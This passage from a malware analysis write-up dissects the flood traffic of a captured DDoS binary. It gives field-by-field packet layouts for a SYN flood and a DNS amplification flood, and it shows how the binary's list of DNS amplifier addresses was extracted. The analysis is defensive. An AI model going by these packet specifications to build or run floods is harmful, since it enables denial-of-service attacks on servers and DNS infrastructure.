   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    Type: 8 (ICMP_ECHO)
    Code: 0
    Checksum: Believed to be correct (but unchecked)

UDP:

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |        UDP Source Port        |      UDP Destination Port     |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           UDP length          |          UDP Checksum         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |     DATA      |
   +-+-+-+-+-+-+-+-+

    UDP Source Port: Always random 0-254.
    UDP Destination Port: Always set by the blackhat to a single port.
    UDP Length: 9 (indicating 1 byte of data)
    UDP Checksum: Believed to be correct (but unchecked)

Overview:
This traffic seems corrupt. This may be deliberate, an attempt to elicit error conditions, or perhaps it has some other sneaky purpose? Run-time testing will be needed to try to understand the purpose behind these packets.

Network_Analysis_E - SYN flood attack

About:
An implementation of a SYN flooder, undoubtedly with the same purpose for which many SYN flooders have been written in the past.
Packet structure:

IP level:

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                        Sequence Number                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Acknowledgment Number                      |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Data |           |U|A|P|R|S|F|                               |
   | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
   |       |           |G|K|H|T|N|N|                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           Checksum            |         Urgent Pointer        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Special Fields:
    Version: 4
    IHL: 5
    TOS: 0
    Total Length: 40
    ID: random 0-254
    Flags / Fragment Offset: 0
    TTL: Random 125 to 240
    Protocol: 6 (TCP)
    IP Checksum: Believed to be correct (but unchecked)
    Source Address: Can be set to a single IP, or randomised
    Destination Address: Primary victim of attack
    TCP Source Port: Randomised between 1 and 40000
    TCP Dest Port: Set by attacker to a single port
    Seq Number: Random 1 to 40000000
    Ack Number: 0
    Data Offset: 5 (20 byte tcp header)
    Flags: SYN
    Window: Random 200 to 1600
    TCP Checksum: Calculated off pseudo header (unchecked if correct)
    Urgent Pointer: 0

Overview:
This attack has been seen many a time before, a simple SYN flooder. Nothing particularly nasty about this one, except perhaps the randomisation of several parts.
The destination IP can also be obtained through resolution of a hostname, which can be looked up again every X seconds (minutes). This could simply be an ease-of-use option for the blackhat, but is more likely to be for prolonged attacks with no interaction from the blackhat.

Network_Analysis_F - DNS request flood attack

About:
This one is the most interesting (and perhaps the most serious) attack in this binary. It is related to the DNS amplification attack, except this time it would appear a single server is used to generate the amplification. This would obviously cause a DoS condition for that server (and a serious one at that).

Packet structure:
Network_Analysis_C shows the types of packets that are constructed in this attack. The differences, however, are:
    Destination IP: This is the victim.
    Source IP: This source can be set by the blackhat to a single address, or it can be continuously randomised.
    UDP Checksum: Always 0.
    UDP Source Port: Can be set by blackhat, or can be random.

Overview:
This traffic is perhaps the most important attack to analyse from the whole binary, primarily because enough infected machines could cause a DoS against pretty much any public nameserver on the Internet. Any public nameserver of course includes gtld and root servers. Coupled with the ability to specify hostnames which are periodically resolved, this attack IS something to be worried about. It is of course nothing new: a DDOS form of this attack is something that has been expected for a long time, as is an undoubted attack on the DNS system. Hopefully the blackhat(s) involved with this DDOS have not compromised enough machines to carry out a large attack, or do not have a desire to do it. (How long till we see a better protected DNS system put into place? This IS important.)

Appendix A - DNS Servers as used by Network_Function_B

The following servers are embedded within the binary for use as traffic amplifiers.
They start from 0x806d22c which corresponds to four bytes after the start of the .data section. Accordingly, the file offset for these is 0x2422c bytes, with the number in little endian word ordering. For instance:

    000c 0282 = 0c.00.82.02 = 12.0.130.2

A file (dnsrip.c) has been provided that works with the HoneyNet supplied binary ONLY.

    exploit-dev:/reverse# ./dnsrip the-binary | wc -l
    11441

A simple shell script can be used to resolve each of these IPs. Due to the size of the list (11441 servers!) the output is not included here, but can be found in DNS_Amplification_Servers.
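The word-swapping in the example above is easy to get wrong by hand, so here is a minimal sketch of it. This is not dnsrip.c; hexdump_words_to_ip and read_ips are hypothetical helpers, and the only assumption is that the words come from default hexdump output, which prints 16-bit values in little endian order.

```python
def hexdump_words_to_ip(words: str) -> str:
    """Turn two hexdump words such as '000c 0282' into a dotted quad."""
    octets = []
    for word in words.split():
        value = int(word, 16)
        octets.append(value & 0xFF)   # low byte is the one stored first in the file
        octets.append(value >> 8)     # high byte follows it
    return ".".join(str(octet) for octet in octets)

def read_ips(blob: bytes, offset: int, count: int) -> list:
    """Read count 4-byte addresses from raw file bytes starting at offset."""
    return [
        ".".join(str(b) for b in blob[offset + 4 * i: offset + 4 * i + 4])
        for i in range(count)
    ]

example = hexdump_words_to_ip("000c 0282")
```

Given the raw bytes of the binary, read_ips(data, 0x2422c, 11441) would walk the embedded list using the offset and count quoted above; no swapping is needed there because the bytes are read in file order.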